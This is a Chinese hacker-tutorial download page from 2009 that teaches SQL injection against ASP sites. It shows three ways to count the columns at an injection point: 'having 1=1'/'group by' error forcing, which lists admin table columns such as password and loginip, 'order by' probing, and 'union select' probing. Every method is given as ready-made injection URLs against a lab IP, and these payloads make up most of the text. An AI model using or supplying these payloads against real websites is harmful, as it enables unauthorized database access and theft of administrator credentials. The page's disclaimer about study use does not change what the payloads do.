黑客软件下载 - 黑客教程下载 - 一天学一点 - 浏览 - 当前注入点字段数查询

当前注入点字段数查询

授权类型:	黑客	特别说明： 1.本站非VIP资料均从网上收集，仅供网络安全爱好者学习、研究所用，请勿用于非法用途，违者责任自负。 2.本站VIP资料专为VIP会员提供，至2008年2月1日起，所有VIP软件、课程均设置有压缩包密码，此密码一月一更新。获取当月VIP压缩密码请到“VIP论坛”、“服务版”查看置顶贴，或在登陆VIP会员帐户后，点击如下连接进入：VIP资料每月密码公布。 3.本站VIP资料专署于所有VIP会员共同所有，任何个人、团体共享、发布、盗连均视为侵权，一经发现，严惩不怠！如果有死连接或下载有问题请联系这里
软件分类:	一天学一点
文件大小:	MB
星级评定:
发布人:
发布时间:	2009-10-15 1:11:55
下载权限:
权限说明:	0 游客;1 普通用户;2 C培训班;3 工具培训班;4 脚本培训班; 5 黑客防线技术团队;6 银牌VIP;7 金牌VIP;8 钻石VIP; 9 铂金VIP;10 管理用户;11 贵宾组;12 核心组;13 顾问组; 15 linux培训班;16 漏洞发掘培训班;17 delphi培训班; 18 java培训班;19 综合实战班;20 vc远控编写班;21 win服务器安全; 22 逆向工程培训班;23 高级xss培训班;24 驱动开发培训班. *无下载权限显示则表示所有注册会员均可下载。
下载次数:	2973 人次

下载地址:	下载地址1

如何获得当前注入点的字段数。获得字段数的方法我知道的有三种

第一种
就是利用having 1=1--逼出当前所的字段数，如

http://192.168.40.22/1/1.asp?id=1%20having%201=1--

有很多人利用这个方法暴得当前列名值，这样我们再利用group by 一行一行逼出所有字段数，如提交如下URL：

http://192.168.40.22/1/1.asp?id=1%20group%20by%20admin_act.id%20having%201=1--

http://192.168.40.22/1/1.asp?id=1 group by admin_act.id,admin_act.Admin_Name having%201=1--

http://192.168.40.22/1/1.asp?id=1%20group%20by%20admin_act.id,admin_act.Admin_Name,admin_act.password,admin_act.User_Name,admin_act.RealName,admin_act.Sex,admin_act.TEL,admin_act.EMAIL,admin_act.AddDate,admin_act.logintime,admin_act.loginip,admin_act.Locked,admin_act.SuperTF,admin_act.LoginNumber,admin_act.Description,admin_act.Purview,admin_act.ACTCMS_QXLX%20having%201=1--

http://192.168.40.22/1/1.asp?id=1 group by admin_act.id,admin_act.Admin_Name,admin_act.password,admin_act.User_Name,admin_act.RealName,admin_act.Sex,admin_act.TEL,admin_act.EMAIL,admin_act.AddDate,admin_act.logintime,admin_act.loginip,admin_act.Locked,admin_act.SuperTF,admin_act.LoginNumber,admin_act.Description,admin_act.Purview,admin_act.ACTCMS_QXLX,admin_act.ACT_Other having%201=1--

第二种

http://192.168.40.22/1/1.asp?id=1%20order%20by%2015 错

http://192.168.40.22/1/1.asp?id=1%20order%20by%2014 对

http://192.168.40.22/1/1.asp?id=1%20order%20by%2019 错

http://192.168.40.22/1/1.asp?id=1%20order%20by%2018 对

第三种

http://192.168.40.22/1/1.asp?id=1and%201=2%20union%20select%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null

http://192.168.40.22/1/1.asp?id=1and%201=2%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null

http://192.168.40.22/1/1.asp?id=1and%201=2%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,null,16,null,null

expression
UNION [ ALL ]
expression
参数
expression
返回一个集合以与该集合进行组合的任何有效查询表达式。所有表达式都必须与 expression 一样属于同一类型或属于公共基类型或派生类型。

UNION
指定组合多个集合并将其作为单个集合返回。

ALL
指定组合多个集合并将其作为单个集合返回（包括重复项）。如果未指定，则从结果集合中删除重复项。